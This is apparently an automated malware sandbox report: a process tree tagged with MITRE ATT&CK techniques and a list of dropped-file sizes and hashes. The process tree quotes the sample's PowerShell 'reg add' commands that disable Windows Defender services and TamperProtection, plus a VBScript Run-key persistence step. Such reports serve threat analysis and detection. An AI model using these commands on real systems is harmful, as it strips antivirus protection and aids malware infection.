C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\乃メᄃフ乙W乃のムム乙キゐリレム.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\PING.EXEping -\Common 10 localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"2⤵
- Adds Run key to start application
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1File Deletion
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
395B
MD5ed60a6e229318430f77c588101134ab3
SHA1999aca0f516558c0ce3b501b0e0ac172c1304161
SHA2565cc8563947de29db37a6c6eda475c993246f054f56ddc34893ccaef9188f10b9
SHA512dc6ee59d582cec837eb89b9327f08da60980dcdde3c6ce4c6a6a20b59ecfda3b6a5a9e2d17b06536172a0c5d1cd739a81fb899ca4c86996d823daa1407abdea3
-
Filesize
711B
MD5165f73dc3352b322003dac336356a4dd
SHA1db064f1272024f22892e4164d3d90f08d47776a9
SHA256cfe26c1974b281174e137a76720270b1a1b46529974d35a0ca0e7d436cab9e4c
SHA5122c09f15443eff40940ccabcc1642f65af057bb9de1a9e884ba8cfe854b3e40e1fee3af29307dfb8c916aafeb0e8cdfbd7c6b90ddcc1b9c1c664ce488c483bf31
-
Filesize
443B
MD582d0aab78d68e662a3c836e45a50283e
SHA1a58dfc74331ce3958a021b02060f3e05523ed755
SHA256442ea26f0245897bda778c22b58c76d34e402e3c5f31af550bfb161c5febd633
SHA512ddf0d379bbd3d1dbb3ffb75a9dccf7c9e29b8562cf1674fb3d0a75112382849d0d6e3aae35115925ef4215aca2d6e98d9a522e95ac443c8d7a76f8132165507a
-
Filesize
1KB
MD563fea3bd8920a554c9385940d9c29568
SHA1fec70ace9502b07386d4317f99653c194e6dd72b
SHA25626c534c65e7f9e68328374bb0e6436e3c96bd92ccad33e271446e09ae395f3b3
SHA512afecd3b158836ff3f11984d60eaabe1e0072471301e30aa997e6e09614a279a1f4852d9e0da5b4ec8b2330378b67177db1cbad6890ab33d29d8b3dd693dbca09
-
Filesize
701B
MD5b8f25807f2c2d5d9f1b724c5c1fbebd9
SHA1f97aca350fdee3994376fb49c075f6b992504758
SHA256e2281b4d79ea1305d702fc3ae3d9d78f51fbafd7e32480f545cc2fc5ae0e4537
SHA512f97b860992024b69544f685465894ff9125a9fa7ee480b97288f9545acba2a80dd5dbd0b14e7463348503bbf65863ccd71fa94efc57350ffb8744c7a9e0ba392
-
Filesize
916KB
MD520e5bc2c26788de1138995f9fa2ad7c5
SHA14f909c814bba89f6058222d2658cc2123b39c463
SHA256594c9dc2d16dca813d55528ec60f84711ca58e828818eb31d42d8d99690eba44
SHA5125c634f834200ce33e8f1ab3e79ba34dc4ac28af780e6cfd4884abefdde85a14d006c0046a658843bd44baf29bb88700e764bcf4000a258edbfff96b533b66bde
-
Filesize
3.2MB
MD52ed95abbfe15c8d0f125b64d8687faa2
SHA137b83c14d0c89d7d328a7954b415cff8b0ce257a
SHA2565e8c4b41430a6ee2d3f72ddd41a5a9f5e6484a8ee143b404e1f45ca645802f30
SHA512f3e44541ecd5688795e44d8a27d7d968d54d84acdb94b707ad911a6635d0186f73efcaf2128946dcc7e8984bf3a0049ee33a048bb0127b1185a827e20eb4a575
-
Filesize
95KB
MD58f9a88eab3424835c4c3cd45142c1da1
SHA1a85396cdd944f2f486597a65f8a46425922c30c0
SHA2562efec2e1440efee7fb641d8468d6676456197eb50ef49236c081e0827f455909
SHA51210a625ea39d82707bfe94d35551818410d5564d1562d59b2e624b2ba29683732e434cd62694dbb681e31d67e2af750147c400dba63db088a4a8ee09326807b95
-
Filesize
587B
MD5ed9315b3f8b61567cba6abaa0c996599
SHA1c36f5bfbb4cc4a7e0b035bb60b938e41548df566
SHA25677409a1eec6c53740a5e35b580215dfbf38496d03fdfac0426e71544cde7239e
SHA512777fee00cb0fa3075ceba83eedc06bb06d9058517ee617d74df88b398b92943d15913497ffc1dee0a3d86096a2cef160d12159cbc3299253dc0d09fa92b03b9c
-
Filesize
216KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
3.6MB
-
Filesize
8KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
5.6MB
-
Filesize
944KB
-
Filesize
2.0MB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
2.0MB
-
Filesize
584KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
6.1MB
-
Filesize
1.0MB
-
Filesize
72KB
-
Filesize
240KB